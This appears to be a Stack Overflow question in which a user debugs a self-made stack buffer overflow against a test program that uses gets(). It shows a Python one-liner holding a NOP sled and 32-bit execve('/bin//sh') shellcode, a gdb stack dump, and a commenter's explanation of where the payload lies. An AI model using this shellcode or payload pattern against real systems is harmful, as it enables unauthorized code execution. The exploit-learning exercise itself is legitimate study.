# Not seeing my input(NOPs) inside the stack

Tags: x86, buffer-overflow, machine-code, shellcode

I have written a piece of code, and I'm trying to perform a buffer overflow.

```
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv){
    char buffer[100];
    gets(buffer);
    
    return 0;
}
```

When I run it inside `gdb` I can see that I have successfully found the `eip` offset. Now when I try to see, where my block of NOPs has landed in the stack, I don't see them.
The command I run inside `gdb`

```
run < attack.txt
```

and the contents of my `attack.txt` file

```
python -c "import sys; sys.stdout.buffer.write(b'\x90'*60 + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80' + b'BBBB'*6)" > attack.txt
```

Below the contents in the stack

```
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) x/500x $esp
0xffffd3a0: 0x00000000  0xffffd454  0xffffd45c  0xffffd3c0
0xffffd3b0: 0xf7f95e2c  0x0804908d  0x00000001  0xffffd454
0xffffd3c0: 0xf7f95e2c  0xffffd45c  0xf7ffcb60  0x00000000
0xffffd3d0: 0xc81e9d2d  0x856cb73d  0x00000000  0x00000000
0xffffd3e0: 0x00000000  0xf7ffcb60  0x00000000  0x1d5e4400
0xffffd3f0: 0xf7ffda20  0xf7d96a86  0xf7f95e2c  0xf7d96bbd
0xffffd400: 0xf7fc9a80  0x0804befc  0x00000000  0xf7ffd000
0xffffd410: 0x00000000  0xf7fda9c0  0xf7d96b3d  0x0804bff4
0xffffd420: 0x00000001  0x08049060  0x00000000  0x08049088
0xffffd430: 0x0804908d  0x00000001  0xffffd454  0x00000000
0xffffd440: 0x00000000  0xf7fcdeb0  0xffffd44c  0xf7ffda20
0xffffd450: 0x00000001  0xffffd65e  0x00000000  0xffffd696
0xffffd460: 0xffffd6a6  0xffffd6ba  0xffffd6f0  0xffffd6fd
0xffffd470: 0xffffd737  0xffffd764  0xffffd77b  0xffffd78f
0xffffd480: 0xffffd7b4  0xffffd7e7  0xffffd825  0xffffd83c
0xffffd490: 0xffffd854  0xffffd897  0xffffd8a7  0xffffd8b3
0xffffd4a0: 0xffffd8d3  0xffffd8e2  0xffffd915  0xffffd920
0xffffd4b0: 0xffffd93b  0xffffd950  0xffffd965  0xffffd974
0xffffd4c0: 0xffffd994  0xffffd9c2  0xffffd9d1  0xffffd9da
0xffffd4d0: 0xffffda2a  0xffffda38  0xffffda49  0xffffda5e
0xffffd4e0: 0xffffda76  0xffffda82  0xffffdb06  0xffffdb17
0xffffd4f0: 0xffffdb4b  0xffffdb7a  0xffffdbc6  0xffffdbd5
0xffffd500: 0xffffdbea  0xffffdc01  0xffffdc1f  0xffffdc33
0xffffd510: 0xffffdc3b  0xffffdc51  0xffffdc83  0xffffdc8e
0xffffd520: 0xffffdc96  0xffffdcaf  0xffffdcca  0xffffdcd5
0xffffd530: 0xffffdce6  0xffffdd05  0xffffdd37  0xffffdd4b
0xffffd540: 0xffffdd69  0xffffdd7f  0xffffdd98  0xffffddb6
0xffffd550: 0xffffde2b  0xffffde41  0xffffde51  0xffffdf1d
0xffffd560: 0xffffdf2f  0xffffdf65  0xffffdf81  0xffffdf99
0xffffd570: 0xffffdfb0  0x00000000  0x00000020  0xf7fc7570
0xffffd580: 0x00000021  0xf7fc7000  0x00000033  0x000006f0
0xffffd590: 0x00000010  0xbfebfbff  0x00000006  0x00001000
0xffffd5a0: 0x00000011  0x00000064  0x00000003  0x08048034
0xffffd5b0: 0x00000004  0x00000020  0x00000005  0x0000000c
0xffffd5c0: 0x00000007  0xf7fc9000  0x00000008  0x00000000
0xffffd5d0: 0x00000009  0x08049060  0x0000000b  0x000003e8
0xffffd5e0: 0x0000000c  0x000003e8  0x0000000d  0x000003e8
0xffffd5f0: 0x0000000e  0x000003e8  0x00000017  0x00000000
0xffffd600: 0x00000019  0xffffd63b  0x0000001a  0x00000002
0xffffd610: 0x0000001f  0xffffdfc0  0x0000000f  0xffffd64b
0xffffd620: 0x0000001b  0x0000001c  0x0000001c  0x00000020
0xffffd630: 0x00000000  0x00000000  0xf5000000  0xee1d5e44
0xffffd640: 0x38691bdc  0x92042efc  0x69b762c8  0x00363836
0xffffd650: 0x00000000  0x00000000  0x00000000  0x682f0000
0xffffd660: 0x2f656d6f  0x622f3372  0x65666675  0x766f2d72
0xffffd670: 0x6c667265  0x2f73776f  0x69206f62  0x656d206e
0xffffd680: 0x79726f6d  0x61786520  0x656c706d  0x6178652f
0xffffd690: 0x656c706d  0x48530032  0x3d4c4c45  0x6e69622f
0xffffd6a0: 0x7361622f  0x4f430068  0x54524f4c  0x3d4d5245
0xffffd6b0: 0x65757274  0x6f6c6f63  0x44580072  0x4f435f47
0xffffd6c0: 0x4749464e  0x5249445f  0x682f3d53  0x2f656d6f
0xffffd6d0: 0x2e2f3372  0x666e6f63  0x6b2f6769  0x65646564
0xffffd6e0: 0x6c756166  0x2f3a7374  0x2f637465  0x00676478
0xffffd6f0: 0x434e5546  0x5453454e  0x3030313d  0x47445800
0xffffd700: 0x5345535f  0x4e4f4953  0x5441505f  0x6f2f3d48
0xffffd710: 0x662f6772  0x64656572  0x746b7365  0x442f706f
0xffffd720: 0x6c707369  0x614d7961  0x6567616e  0x65532f72
0xffffd730: 0x6f697373  0x5400306e  0x494d5245  0x4f54414e
0xffffd740: 0x42445f52  0x505f5355  0x3d485441  0x74656e2f
0xffffd750: 0x6e65742f  0x2f756873  0x6d726554  0x74616e69
0xffffd760: 0x0032726f  0x415f434c  0x45524444  0x733d5353
0xffffd770: 0x4c415f71  0x4654552e  0x4c00382d  0x414e5f43
0xffffd780: 0x733d454d  0x4c415f71  0x4654552e  0x5300382d
0xffffd790: 0x415f4853  0x5f485455  0x4b434f53  0x75722f3d
0xffffd7a0: 0x73752f6e  0x312f7265  0x2f303030  0x2f726367
0xffffd7b0: 0x00687373  0x4f4d454d  0x505f5952  0x53534552
0xffffd7c0: 0x5f455255  0x54495257  0x32633d45  0x535a7439
0xffffd7d0: 0x444d7941  0x444d7741  0x6a4d6741  0x444d7741
0xffffd7e0: 0x414d7741  0x54003d41  0x494d5245  0x4f54414e
0xffffd7f0: 0x55555f52  0x753d4449  0x753a6e72  0x3a646975
0xffffd800: 0x39313630  0x39303261  0x3664632d  0x32342d61
0xffffd810: 0x392d3237  0x2d386161  0x39303364  0x35363136
0xffffd820: 0x34613261  0x53454400  0x504f544b  0x5345535f
0xffffd830: 0x4e4f4953  0x616c703d  0x00616d73  0x4d5f434c
0xffffd840: 0x54454e4f  0x3d595241  0x415f7173  0x54552e4c
0xffffd850: 0x00382d46  0x5f4b5447  0x465f4352  0x53454c49
0xffffd860: 0x74652f3d  0x74672f63  0x74672f6b  0x3a63726b
0xffffd870: 0x6d6f682f  0x33722f65  0x74672e2f  0x3a63726b
0xffffd880: 0x6d6f682f  0x33722f65  0x6f632e2f  0x6769666e
0xffffd890: 0x6b74672f  0x58006372  0x53525543  0x535f524f
0xffffd8a0: 0x3d455a49  0x45003631  0x4f544944  0x616e3d52
0xffffd8b0: 0x47006f6e  0x4d5f4b54  0x4c55444f  0x633d5345
0xffffd8c0: 0x65626e61  0x2d617272  0x2d6b7467  0x75646f6d
0xffffd8d0: 0x5800656c  0x535f4744  0x3d544145  0x74616573
0xffffd8e0: 0x57500030  0x682f3d44  0x2f656d6f  0x622f3372
0xffffd8f0: 0x65666675  0x766f2d72  0x6c667265  0x2f73776f
0xffffd900: 0x69206f62  0x656d206e  0x79726f6d  0x61786520
0xffffd910: 0x656c706d  0x474f4c00  0x454d414e  0x0033723d
0xffffd920: 0x5f474458  0x53534553  0x5f4e4f49  0x4b534544
0xffffd930: 0x3d504f54  0x73616c70  0x5800616d  0x535f4744
0xffffd940: 0x49535345  0x545f4e4f  0x3d455059  0x00313178
0xffffd950: 0x54535953  0x5f444d45  0x43455845  0x4449505f
0xffffd960: 0x3736383d  0x2f3d5f00  0x2f727375  0x2f6e6962
0xffffd970: 0x00626467  0x54554158  0x49524f48  0x2f3d5954
0xffffd980: 0x656d6f68  0x2f33722f  0x7561582e  0x726f6874
0xffffd990: 0x00797469  0x5f474458  0x45455247  0x5f524554
0xffffd9a0: 0x41544144  0x5249445f  0x61762f3d  0x696c2f72
0xffffd9b0: 0x696c2f62  0x64746867  0x61642d6d  0x722f6174
0xffffd9c0: 0x4f4d0033  0x535f4454  0x4e574f48  0x6d61703d
0xffffd9d0: 0x4e494c00  0x343d5345  0x54470034  0x525f324b
0xffffd9e0: 0x49465f43  0x3d53454c  0x6374652f  0x6b74672f
0xffffd9f0: 0x302e322d  0x6b74672f  0x2f3a6372  0x656d6f68
0xffffda00: 0x2f33722f  0x6b74672e  0x322d6372  0x2f3a302e
0xffffda10: 0x656d6f68  0x2f33722f  0x6e6f632e  0x2f676966
0xffffda20: 0x726b7467  0x2e322d63  0x4f480030  0x2f3d454d
0xffffda30: 0x656d6f68  0x0033722f  0x474e414c  0x5f6e653d
0xffffda40: 0x552e5355  0x382d4654  0x5f434c00  0x45504150
0xffffda50: 0x71733d52  0x2e4c415f  0x2d465455  0x44580038
0xffffda60: 0x55435f47  0x4e455252  0x45445f54  0x4f544b53
0xffffda70: 0x444b3d50  0x4f430045  0x4e4d554c  0x39313d53
0xffffda80: 0x454d0035  0x59524f4d  0x4552505f  0x52555353
0xffffda90: 0x41575f45  0x3d484354  0x7379732f  0x2f73662f
0xffffdaa0: 0x6f726763  0x752f7075  0x2e726573  0x63696c73
0xffffdab0: 0x73752f65  0x312d7265  0x2e303030  0x63696c73
0xffffdac0: 0x73752f65  0x31407265  0x2e303030  0x76726573
0xffffdad0: 0x2f656369  0x73736573  0x2e6e6f69  0x63696c73
0xffffdae0: 0x6c702f65  0x616d7361  0x65646b2d  0x65732e64
0xffffdaf0: 0x63697672  0x656d2f65  0x79726f6d  0x6572702e
0xffffdb00: 0x72757373  0x54560065  0x45565f45  0x4f495352
0xffffdb10: 0x34373d4e  0x58003230  0x535f4744  0x5f544145
0xffffdb20: 0x48544150  0x726f2f3d  0x72662f67  0x65646565
0xffffdb30: 0x6f746b73  0x69442f70  0x616c7073  0x6e614d79
0xffffdb40: 0x72656761  0x6165532f  0x49003074  0x434f564e
0xffffdb50: 0x4f495441  0x44495f4e  0x6332613d  0x63336361
0xffffdb60: 0x37663239  0x33623466  0x39316235  0x31346530
```

I had the same program, but instead of `gets` I used `strcpy`, and I did find the NOPs in the stack. So why isn't this working now? I have disabled `ASLR`.

Comment: You're faulting at `0x42424242`, presumably after a `ret` that popped some of the `"BBBBBB..."` part of the string into EIP.  This means ESP is pointing near the end of what you injected, so all your NOPs and code are below ESP.  `x $esp-108` should show them.  If your return address had been correct, `x $eip` or `disas` would show them, if you single-stepped or set a breakpoint at that point.  But EIP has a bad address.